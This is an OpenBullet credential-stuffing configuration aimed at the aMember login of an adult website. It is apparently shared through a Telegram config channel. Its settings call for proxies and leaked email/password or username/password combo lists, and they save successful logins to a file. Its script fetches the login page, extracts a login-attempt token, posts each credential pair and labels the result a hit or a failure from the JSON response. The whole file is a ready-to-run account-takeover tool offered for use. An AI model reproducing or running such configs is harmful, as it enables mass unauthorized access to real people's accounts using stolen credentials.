[SETTINGS]
{
  "Name": "Hentaied.com",
  "SuggestedBots": 99,
  "MaxCPM": 0,
  "LastModified": "2022-07-15T22:46:06.5117772+04:30",
  "AdditionalInfo": "https://t.me/OpenBullet_CFGs",
  "RequiredPlugins": [],
  "Author": "DS Team | @Im3eyyeD and @DanialG0d",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": true,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://hentaied.com/amember/login" 
  
  HEADER "Host: hentaied.com" 
  HEADER "Connection: keep-alive" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Referer: https://hentaied.com/" 
  HEADER "Accept-Language: en-US,en;q=0.9,fa;q=0.8,fr;q=0.7,ru;q=0.6" 
  HEADER "Accept-Encoding: gzip, deflate" 

PARSE "<SOURCE>" CSS "[name=login_attempt_id]" "value" -> VAR "id" 

REQUEST POST "https://hentaied.com/amember/login" Multipart 
  
  STRINGCONTENT "amember_login: <USER>" 
  STRINGCONTENT "amember_pass: <PASS>" 
  STRINGCONTENT "login_attempt_id: <id>" 
  STRINGCONTENT "_referer: https://hentaied.com/the-arcade-machine-pt2/" 
  HEADER "Host: hentaied.com" 
  HEADER "Connection: keep-alive" 
  HEADER "accept: application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 
  HEADER "Origin: https://hentaied.com" 
  HEADER "Referer: https://hentaied.com/amember/login" 
  HEADER "Accept-Language: en-US,en;q=0.9,fa;q=0.8,fr;q=0.7,ru;q=0.6" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 521" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\"ok\":false" 
  KEYCHAIN Success OR 
    KEY "\"ok\":true" 

